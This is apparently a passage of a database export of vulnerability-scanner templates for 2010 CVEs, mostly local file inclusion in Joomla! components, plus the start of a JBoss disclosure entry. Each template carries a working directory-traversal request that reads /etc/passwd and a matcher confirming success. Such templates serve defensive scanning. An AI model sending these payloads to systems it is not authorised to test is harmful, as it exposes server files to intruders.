\"{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022078e94288c545c86d3739bfc673b0cb40d9db80ede64d7de24b9bfe1562d54d01022069a099e794e1021a4404dc94821f8840fe88456b958ec238d5edee3da0c18505:922c64590222798bb761d5b6d8e72950", "hash": "717f9732ce2ece98c43dc0a0a86a2ecc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e73" }, "name": "CVE-2010-1302.yaml", "content": "id: CVE-2010-1302\n\ninfo:\n name: Joomla! Component DW Graph - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11978\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1302\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1302\n cwe-id: CWE-22\n epss-score: 0.01204\n epss-percentile: 0.84918\n cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: decryptweb\n product: com_dwgraphs\n tags: cve,cve2010,edb,joomla,lfi,graph,decryptweb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bb37e531453032b693abfd563eb09d145f724ef3ca1d86023b9f1b2fbe4d107e02207df22aa55b994ea2c6bb5f7823da50701a07a15cc04d87e133ca41618351011d:922c64590222798bb761d5b6d8e72950", "hash": "0dc5aaa830775ff291a17dfd1559db16", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e74" }, "name": "CVE-2010-1304.yaml", "content": "id: CVE-2010-1304\n\ninfo:\n name: Joomla! Component User Status - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11998\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1304\n - http://www.exploit-db.com/exploits/11998\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57483\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1304\n cwe-id: CWE-22\n epss-score: 0.0045\n epss-percentile: 0.74575\n cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamo\n product: com_userstatus\n tags: cve,cve2010,joomla,lfi,status,edb,joomlamo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d3cb43212c8a3df17ee31855688e3d652f5314ee4124a7bd521c42f1982d460502201239ce976e80c6e0076a2883ce41cb8bd687c8176e3c5073b2239895d476ebdb:922c64590222798bb761d5b6d8e72950", "hash": "22d162af75ab4cf5c8a7d8911a3077d9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e75" }, "name": "CVE-2010-1305.yaml", "content": "id: CVE-2010-1305\n\ninfo:\n name: Joomla! Component JInventory 1.23.02 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12065\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1305\n - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951\n - http://www.vupen.com/english/advisories/2010/0811\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57538\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1305\n cwe-id: CWE-22\n epss-score: 0.03203\n epss-percentile: 0.90236\n cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamo\n product: com_jinventory\n tags: cve,cve2010,joomla,lfi,edb,joomlamo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008359d835a31bb6cdf1904ec4e2657c736624dfcfa5fcd01f3a02a8257d33048d02204b9552e1cb25efd557234b0af9313dd2f5474de89c5865b764178e1d4d38905e:922c64590222798bb761d5b6d8e72950", "hash": "d5d6400214df707478cdef6e851b3104", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e76" }, "name": "CVE-2010-1306.yaml", "content": "id: CVE-2010-1306\n\ninfo:\n name: Joomla! Component Picasa 2.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12058\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1306\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57508\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1306\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.85196\n cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: roberto_aloi\n product: com_joomlapicasa2\n tags: cve,cve2010,joomla,lfi,edb,roberto_aloi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220548521f736459dae087d6a2bd94e3ae9773f5b831cff83356187c4188522b8f802201265d0b432dbacee031aaaf9bcbc72699612e5e25f881527cde284df0d35481c:922c64590222798bb761d5b6d8e72950", "hash": "af994bc549a20837d75ec371231da941", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e77" }, "name": "CVE-2010-1307.yaml", "content": "id: CVE-2010-1307\n\ninfo:\n name: Joomla! Component Magic Updater - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12070\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1307\n - http://www.vupen.com/english/advisories/2010/0806\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1307\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.86604\n cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: software.realtyna\n product: com_joomlaupdater\n tags: cve,cve2010,edb,joomla,lfi,software.realtyna\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205ee411e0df19bcb5be4939061e5b85f81c3ee3250e70223ecf19da638a332c6802207f1fbb956555429b3a2c32ad9d53e161530e3ebb76b3b8fafbc6483ff62c0d35:922c64590222798bb761d5b6d8e72950", "hash": "1937557698663b6ed9324cc393f7ddd2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e78" }, "name": "CVE-2010-1308.yaml", "content": "id: CVE-2010-1308\n\ninfo:\n name: Joomla! Component SVMap 1.1.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12066\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1308\n - http://www.vupen.com/english/advisories/2010/0809\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1308\n cwe-id: CWE-22\n epss-score: 0.01334\n epss-percentile: 0.85765\n cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: la-souris-verte\n product: com_svmap\n tags: cve,cve2010,joomla,lfi,edb,la-souris-verte\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c29bf12509751c6d4971b808635de57b7692d9e53df31d4b294649bb5ce456db022100bd518edc4ef976a87843b5cf5c4eec01353017a668000897cd0020a9fd09f094:922c64590222798bb761d5b6d8e72950", "hash": "7910bf6404bb565b1c7aaaf1e2b29781", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e79" }, "name": "CVE-2010-1312.yaml", "content": "id: CVE-2010-1312\n\ninfo:\n name: Joomla! Component News Portal 1.5.x - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12077\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1312\n - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1312\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.83338\n cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ijoomla\n product: com_news_portal\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d20ace89e5fba9e38e12b29dcdf7f94465027da5466716242a9d9a23d933a1b202200ead3153d09e06b648a9c10ea73a58a9c85db18e8c136d6d177acdccb61f00fd:922c64590222798bb761d5b6d8e72950", "hash": "34ab60ce8ab7a5d1da9305f1a189a4dc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7a" }, "name": "CVE-2010-1313.yaml", "content": "id: CVE-2010-1313\n\ninfo:\n name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12082\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1313\n - http://www.exploit-db.com/exploits/12082\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-1313\n cwe-id: CWE-22\n epss-score: 0.0045\n epss-percentile: 0.72402\n cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: seber\n product: com_sebercart\n tags: cve,cve2010,joomla,lfi,edb,seber\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e2ee5113ea7ef6e40728910e3d42e905985b5b2f7ce07d14947241170a9a1dc9022029c4419ef7ee627daa6f2d32119c452f396ae07a75d68bf757f8b36f3d72279e:922c64590222798bb761d5b6d8e72950", "hash": "7a57aed4f8acc8d8b9eb8d7b3c4cc5dc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7b" }, "name": "CVE-2010-1314.yaml", "content": "id: CVE-2010-1314\n\ninfo:\n name: Joomla! Component Highslide 1.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12086\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1314\n - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1314\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlanook\n product: com_hsconfig\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,joomlanook\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009af853087a4818f3b40be3d023435dd789ec1badcb73949d41adfdfb8ffbe233022100d3bf069aa45a4e07a8ab6390cdc65d98ef6675f01ea2c12cba76b36042b91fc5:922c64590222798bb761d5b6d8e72950", "hash": "6c1a3b005fd5834bd163d9b63d828cd0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7c" }, "name": "CVE-2010-1315.yaml", "content": "id: CVE-2010-1315\n\ninfo:\n name: Joomla! Component webERPcustomer - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11999\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1315\n - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57482\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1315\n cwe-id: CWE-22\n epss-score: 0.0087\n epss-percentile: 0.82023\n cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamo\n product: com_weberpcustomer\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dd10b899ed886c29db67e5b79cf219545f680f39b12d5d8afbcc2bb0f48ad20702206c5a8174bb915705ddb88eee879ee3c44d6bb6924b51d8a2452e908474fe6e58:922c64590222798bb761d5b6d8e72950", "hash": "dc36e9994bea9986556a79c9a3619062", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7d" }, "name": "CVE-2010-1340.yaml", "content": "id: CVE-2010-1340\n\ninfo:\n name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n The vulnerability allows an attacker to include arbitrary local files, leading to remote code execution or sensitive information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/33797\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1340\n - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57123\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1340\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.83281\n cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla-research\n product: com_jresearch\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,joomla-research\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008afd34392382e5f6b19579d04b60518d4f35a6d45218dc673a8ef6c3f0e5207a022023ed93d4307ee15b5771ab85343fba0cc623272b9ac9c067059ffec8e40939d4:922c64590222798bb761d5b6d8e72950", "hash": "fa041110575c58b8d4b70db86769c3ae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7e" }, "name": "CVE-2010-1345.yaml", "content": "id: CVE-2010-1345\n\ninfo:\n name: Joomla! Component Cookex Agency CKForms - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15453\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1345\n - http://www.exploit-db.com/exploits/11785\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1345\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cookex\n product: com_ckforms\n tags: cve2010,cve,lfi,edb,joomla,cookex\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203d0345bc171d83b4201aa878f8a267915ce9379a6fcc88c609476ecc452ecc4f02200bfc25daa3c0bb029d6639d3a22eba998fce947d379499b47a17083afbb0c816:922c64590222798bb761d5b6d8e72950", "hash": "23477588b6792ae9aee63dac8791ca1e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e7f" }, "name": "CVE-2010-1352.yaml", "content": "id: CVE-2010-1352\n\ninfo:\n name: Joomla! Component Juke Box 1.7 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12084\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1352\n - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1352\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jooforge\n product: com_jukebox\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,jooforge\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d337364bec15e62a5e51894f00482a853c0b83de12621326180d670fe85be2550220100fd4c82fbacc8ea7654009879641cc7e3cbbd695d9c489fe313644a3fdf818:922c64590222798bb761d5b6d8e72950", "hash": "571fb9c21403e5fa8cd2a0d87f37be15", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e80" }, "name": "CVE-2010-1353.yaml", "content": "id: CVE-2010-1353\n\ninfo:\n name: Joomla! Component LoginBox - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in LoginBox component.\n reference:\n - https://www.exploit-db.com/exploits/12068\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1353\n - http://www.vupen.com/english/advisories/2010/0808\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57533\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1353\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.87665\n cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wowjoomla\n product: com_loginbox\n tags: cve,cve2010,joomla,lfi,edb,wowjoomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022043fd12edb4a3a2a5476d0728b0371efefd549591b361970554bafd57766a5a7d0220319e614d046afdbc29519ddcf8c1b48b88a98655409e986e93b30e09366c7a41:922c64590222798bb761d5b6d8e72950", "hash": "f7644d129e5864dcac81b994cd17d17b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e81" }, "name": "CVE-2010-1354.yaml", "content": "id: CVE-2010-1354\n\ninfo:\n name: Joomla! Component VJDEO 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12102\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1354\n - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt\n - http://www.exploit-db.com/exploits/12102\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1354\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.73222\n cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ternaria\n product: com_vjdeo\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,ternaria\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203e7b0577bb4c487c2041c049e54955ba57fcef21993bed3ee4a35397e5093009022012c708fe0fd04232b8a6542de8c0b947b5f72f266a2755b9ec230c1503415d79:922c64590222798bb761d5b6d8e72950", "hash": "3383d9de106011d8e102dafbf8dc0b0e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e82" }, "name": "CVE-2010-1429.yaml", "content": "id: CVE-2010-1429\n\ninfo:\n name: Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure\n author: R12W4N\n severity: medium\n description: |\n Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about \"deployed web contexts\" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Apply the necessary patches or updates provided by Red Hat to fix the vulnerability.\n reference:\n - https://rhn.redhat.com/errata/RHSA-2010-0377.html\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1429\n - https://nvd.nist.gov/vuln/detail/CVE-2008-3273\n - http://marc.info/?l=bugtraq&m=132698550418872&w=2\n - http://securitytracker.com/id?1023918\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1429\n cwe-id: CWE-264\n epss-score: 0.00573\n epss-percentile: 0.77469\n cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: redhat\n product: jboss_enterprise_application_platform\n shodan-query: title:\"JBoss\"\n tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat\n\nhttp:\n - method: GET\n path:\n 